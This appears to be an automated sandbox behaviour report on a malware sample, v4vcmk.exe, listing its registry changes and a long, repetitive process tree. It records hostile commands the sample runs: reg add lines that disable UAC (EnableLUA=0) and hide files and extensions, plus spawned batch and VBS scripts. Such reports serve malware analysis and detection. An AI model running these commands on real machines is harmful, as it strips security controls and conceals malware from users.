PID 3212 wrote to memory of 4044 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Windows\SysWOW64\cmd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\cmd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\cmd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\cmd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Windows\SysWOW64\cmd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Windows\SysWOW64\cmd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\cmd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\cmd.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

"C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe"

C:\Users\Admin\fSgEsIQI\dAkcYIYg.exe

"C:\Users\Admin\fSgEsIQI\dAkcYIYg.exe"

C:\ProgramData\WwgMQcMw\LyocAoAM.exe

"C:\ProgramData\WwgMQcMw\LyocAoAM.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eewUwIAg.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KmEMMMck.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oiUcsAoE.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\buskYcUk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zMEQogAA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bcQoEgII.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ncIgIoUw.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HaIYwMoI.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VSYAEMQM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pooUoUQI.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QCgIAsYA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KwcAQkMA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KYEkMowQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WuIYEEIY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OQUEQUwg.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AsIMYIoI.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lmQkwEsU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZsYEsEkg.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NqcYUAQk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\huwwIUUo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\leAcYQEE.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VOIMYEQY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oUogkwAw.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QkYYockM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eyEQYMIc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

